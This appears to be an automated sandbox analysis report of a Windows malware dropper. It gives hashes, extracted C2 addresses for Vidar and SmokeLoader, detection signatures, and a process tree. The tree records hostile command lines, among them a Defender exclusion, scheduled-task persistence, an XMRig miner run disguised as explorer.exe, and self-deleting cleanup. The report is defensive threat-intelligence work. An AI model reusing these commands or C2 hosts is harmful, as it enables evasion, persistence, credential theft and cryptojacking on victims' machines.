Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-en
  • submitted
    08-09-2021 06:02

General

  • Target

    90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe

  • Size

    2.9MB

  • MD5

    3f1f81101d0ce95fdfac97f5913cd662

  • SHA1

    8e615a64e4d72b08926242b7d73a608bdd7e9fce

  • SHA256

    90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407

  • SHA512

    a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.5

Botnet

916

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    916

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 1 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 42 IoCs
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe
    "C:\Users\Admin\AppData\Local\Temp\90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1472
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:704
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
              PID:880
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:616
            • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11d7385a978cc.exe
              Tue11d7385a978cc.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1896
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe
            4⤵
            • Loads dropped DLL
            PID:592
            • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11f251db82fb7b.exe
              Tue11f251db82fb7b.exe
              5⤵
              • Executes dropped EXE
              PID:1436
              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                6⤵
                  PID:2716
                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                    7⤵
                      PID:3048
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                        8⤵
                          PID:988
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                            9⤵
                            • Creates scheduled task(s)
                            PID:1692
                        • C:\Users\Admin\AppData\Roaming\services64.exe
                          "C:\Users\Admin\AppData\Roaming\services64.exe"
                          8⤵
                            PID:2972
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                              9⤵
                                PID:2596
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                  10⤵
                                  • Creates scheduled task(s)
                                  PID:2476
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                9⤵
                                  PID:1700
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                  9⤵
                                    PID:2756
                              • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                7⤵
                                  PID:1736
                                • C:\Users\Admin\AppData\Local\Temp\2.exe
                                  "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                  7⤵
                                    PID:372
                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                      8⤵
                                        PID:1816
                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                      7⤵
                                        PID:1476
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                          8⤵
                                            PID:1640
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "setup.exe" /f
                                              9⤵
                                              • Kills process with taskkill
                                              PID:3060
                                        • C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"
                                          7⤵
                                            PID:840
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit
                                              8⤵
                                                PID:632
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im Alfanewfile2.exe /f
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:1740
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 6
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:2900
                                            • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                              "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                              7⤵
                                                PID:1532
                                                • C:\Users\Admin\AppData\Local\Temp\is-NMNMD.tmp\setup_2.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-NMNMD.tmp\setup_2.tmp" /SL5="$10196,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                  8⤵
                                                    PID:2648
                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                      9⤵
                                                        PID:2884
                                                        • C:\Users\Admin\AppData\Local\Temp\is-UTCOR.tmp\setup_2.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-UTCOR.tmp\setup_2.tmp" /SL5="$201B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                          10⤵
                                                            PID:2348
                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                      7⤵
                                                        PID:2684
                                                      • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                        7⤵
                                                          PID:2916
                                                        • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                          7⤵
                                                            PID:1044
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe
                                                      4⤵
                                                      • Loads dropped DLL
                                                      PID:936
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11b9d76a96506.exe
                                                        Tue11b9d76a96506.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:984
                                                        • C:\Users\Admin\AppData\Local\Temp\is-FTQHA.tmp\Tue11b9d76a96506.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-FTQHA.tmp\Tue11b9d76a96506.tmp" /SL5="$4012C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11b9d76a96506.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:2112
                                                          • C:\Users\Admin\AppData\Local\Temp\is-S1M4P.tmp\46807GHF____.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-S1M4P.tmp\46807GHF____.exe" /S /UID=burnerch2
                                                            7⤵
                                                              PID:2824
                                                              • C:\Program Files\Windows Defender\ODMKZTRDEC\ultramediaburner.exe
                                                                "C:\Program Files\Windows Defender\ODMKZTRDEC\ultramediaburner.exe" /VERYSILENT
                                                                8⤵
                                                                  PID:2492
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-OEP19.tmp\ultramediaburner.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-OEP19.tmp\ultramediaburner.tmp" /SL5="$301A0,281924,62464,C:\Program Files\Windows Defender\ODMKZTRDEC\ultramediaburner.exe" /VERYSILENT
                                                                    9⤵
                                                                      PID:584
                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                        10⤵
                                                                          PID:2216
                                                                    • C:\Users\Admin\AppData\Local\Temp\ba-415fe-e5a-6638c-c528d7e5ea83c\Qoxofuvishe.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\ba-415fe-e5a-6638c-c528d7e5ea83c\Qoxofuvishe.exe"
                                                                      8⤵
                                                                        PID:2772
                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                          9⤵
                                                                            PID:3048
                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3048 CREDAT:275457 /prefetch:2
                                                                              10⤵
                                                                                PID:2156
                                                                          • C:\Users\Admin\AppData\Local\Temp\05-5a10b-aef-b199a-191c480282b2d\Moriqefaeka.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\05-5a10b-aef-b199a-191c480282b2d\Moriqefaeka.exe"
                                                                            8⤵
                                                                              PID:2916
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wqhufond.qmk\GcleanerEU.exe /eufive & exit
                                                                                9⤵
                                                                                  PID:2180
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        PID:584
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue1109eec571ac.exe
                                                                          Tue1109eec571ac.exe /mixone
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:1640
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue1109eec571ac.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue1109eec571ac.exe" & exit
                                                                            6⤵
                                                                              PID:2712
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im "Tue1109eec571ac.exe" /f
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:2820
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe
                                                                          4⤵
                                                                          • Loads dropped DLL
                                                                          PID:1560
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11bc0507b56295.exe
                                                                            Tue11bc0507b56295.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:580
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
                                                                          4⤵
                                                                          • Loads dropped DLL
                                                                          PID:1556
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11141271fbe5877f.exe
                                                                            Tue11141271fbe5877f.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:1084
                                                                            • C:\ProgramData\339232.exe
                                                                              "C:\ProgramData\339232.exe"
                                                                              6⤵
                                                                                PID:2672
                                                                                • C:\Windows\system32\WerFault.exe
                                                                                  C:\Windows\system32\WerFault.exe -u -p 2672 -s 1780
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:2204
                                                                              • C:\ProgramData\8685254.exe
                                                                                "C:\ProgramData\8685254.exe"
                                                                                6⤵
                                                                                  PID:2792
                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                    7⤵
                                                                                      PID:2984
                                                                                  • C:\ProgramData\4044235.exe
                                                                                    "C:\ProgramData\4044235.exe"
                                                                                    6⤵
                                                                                      PID:1040
                                                                                    • C:\ProgramData\2361480.exe
                                                                                      "C:\ProgramData\2361480.exe"
                                                                                      6⤵
                                                                                        PID:884
                                                                                      • C:\ProgramData\1060764.exe
                                                                                        "C:\ProgramData\1060764.exe"
                                                                                        6⤵
                                                                                          PID:2140
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 616
                                                                                            7⤵
                                                                                            • Program crash
                                                                                            PID:2944
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:1732
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue118f55232e4.exe
                                                                                        Tue118f55232e4.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:284
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                          6⤵
                                                                                            PID:3016
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im chrome.exe
                                                                                              7⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2316
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
                                                                                        4⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:1996
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe
                                                                                        4⤵
                                                                                          PID:1680
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue112c483dd3245d.exe
                                                                                      Tue112c483dd3245d.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:1188
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 960
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:2956
                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                    1⤵
                                                                                    • Process spawned unexpected child process
                                                                                    PID:2572
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                      2⤵
                                                                                        PID:2592
                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                      1⤵
                                                                                        PID:3044
                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                        1⤵
                                                                                        • Process spawned unexpected child process
                                                                                        PID:2680
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                          2⤵
                                                                                            PID:2724

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v6

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • memory/372-235-0x000000001B330000-0x000000001B332000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/372-230-0x0000000000250000-0x0000000000251000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/580-185-0x0000000000400000-0x0000000002B48000-memory.dmp

                                                                                          Filesize

                                                                                          39.3MB

                                                                                        • memory/580-183-0x0000000000240000-0x0000000000249000-memory.dmp

                                                                                          Filesize

                                                                                          36KB

                                                                                        • memory/584-315-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/840-236-0x0000000003020000-0x00000000057D2000-memory.dmp

                                                                                          Filesize

                                                                                          39.7MB

                                                                                        • memory/840-238-0x0000000000400000-0x0000000002BB2000-memory.dmp

                                                                                          Filesize

                                                                                          39.7MB

                                                                                        • memory/880-178-0x00000000005E0000-0x00000000005E1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/880-179-0x00000000005E1000-0x00000000005E2000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/880-186-0x00000000005E2000-0x00000000005E4000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/884-259-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/984-170-0x0000000000400000-0x000000000046D000-memory.dmp

                                                                                          Filesize

                                                                                          436KB

                                                                                        • memory/1040-233-0x0000000001140000-0x0000000001141000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1040-237-0x0000000000500000-0x0000000000501000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1084-180-0x0000000000260000-0x0000000000275000-memory.dmp

                                                                                          Filesize

                                                                                          84KB

                                                                                        • memory/1084-167-0x00000000001C0000-0x00000000001C1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1084-187-0x000000001AA60000-0x000000001AA62000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/1188-184-0x00000000034D0000-0x0000000005C82000-memory.dmp

                                                                                          Filesize

                                                                                          39.7MB

                                                                                        • memory/1188-182-0x0000000000400000-0x0000000002BB2000-memory.dmp

                                                                                          Filesize

                                                                                          39.7MB

                                                                                        • memory/1232-204-0x0000000003CB0000-0x0000000003CC5000-memory.dmp

                                                                                          Filesize

                                                                                          84KB

                                                                                        • memory/1436-129-0x00000000000A0000-0x00000000000A1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1436-188-0x000000001B0A0000-0x000000001B0A2000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/1472-130-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                          Filesize

                                                                                          152KB

                                                                                        • memory/1472-97-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/1472-100-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/1472-105-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/1472-110-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/1472-125-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/1472-82-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                          Filesize

                                                                                          572KB

                                                                                        • memory/1472-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/1472-84-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                          Filesize

                                                                                          152KB

                                                                                        • memory/1472-121-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                          Filesize

                                                                                          572KB

                                                                                        • memory/1476-277-0x0000000000400000-0x0000000002B53000-memory.dmp

                                                                                          Filesize

                                                                                          39.3MB

                                                                                        • memory/1476-276-0x0000000000260000-0x000000000028F000-memory.dmp

                                                                                          Filesize

                                                                                          188KB

                                                                                        • memory/1532-261-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/1640-177-0x0000000000400000-0x0000000002B61000-memory.dmp

                                                                                          Filesize

                                                                                          39.4MB

                                                                                        • memory/1640-176-0x0000000002EE0000-0x0000000002F28000-memory.dmp

                                                                                          Filesize

                                                                                          288KB

                                                                                        • memory/1700-339-0x0000000002060000-0x0000000002062000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/1736-225-0x0000000000370000-0x0000000000371000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1816-300-0x0000000000400000-0x0000000002575000-memory.dmp

                                                                                          Filesize

                                                                                          33.5MB

                                                                                        • memory/1816-299-0x0000000002B30000-0x0000000004CA5000-memory.dmp

                                                                                          Filesize

                                                                                          33.5MB

                                                                                        • memory/1996-53-0x0000000075201000-0x0000000075203000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/2112-181-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2140-262-0x00000000010B0000-0x00000000010B1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2140-244-0x0000000001150000-0x0000000001151000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2204-333-0x0000000002370000-0x0000000002371000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2216-351-0x0000000000516000-0x0000000000535000-memory.dmp

                                                                                          Filesize

                                                                                          124KB

                                                                                        • memory/2216-352-0x0000000000535000-0x0000000000536000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2216-317-0x0000000000510000-0x0000000000512000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/2348-291-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2492-306-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                          Filesize

                                                                                          88KB

                                                                                        • memory/2648-271-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2672-196-0x00000000004E0000-0x000000000052B000-memory.dmp

                                                                                          Filesize

                                                                                          300KB

                                                                                        • memory/2672-198-0x0000000000530000-0x0000000000531000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2672-205-0x000000001B020000-0x000000001B022000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/2672-192-0x0000000000B70000-0x0000000000B71000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2672-195-0x0000000000340000-0x0000000000341000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2716-202-0x00000000009D0000-0x00000000009D1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2756-348-0x00000000002F0000-0x0000000000310000-memory.dmp

                                                                                          Filesize

                                                                                          128KB

                                                                                        • memory/2756-346-0x0000000140000000-0x0000000140763000-memory.dmp

                                                                                          Filesize

                                                                                          7.4MB

                                                                                        • memory/2772-316-0x0000000001F00000-0x0000000001F02000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/2792-210-0x0000000000600000-0x000000000060C000-memory.dmp

                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/2792-211-0x00000000006D0000-0x00000000006D1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2792-207-0x0000000000810000-0x0000000000811000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2792-209-0x00000000005F0000-0x00000000005F1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2824-206-0x0000000000A50000-0x0000000000A52000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/2884-279-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/2916-294-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2916-349-0x0000000000322000-0x0000000000323000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2916-319-0x0000000000320000-0x0000000000322000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/2916-350-0x0000000000327000-0x0000000000346000-memory.dmp

                                                                                          Filesize

                                                                                          124KB

                                                                                        • memory/2944-342-0x0000000000370000-0x00000000003B8000-memory.dmp

                                                                                          Filesize

                                                                                          288KB

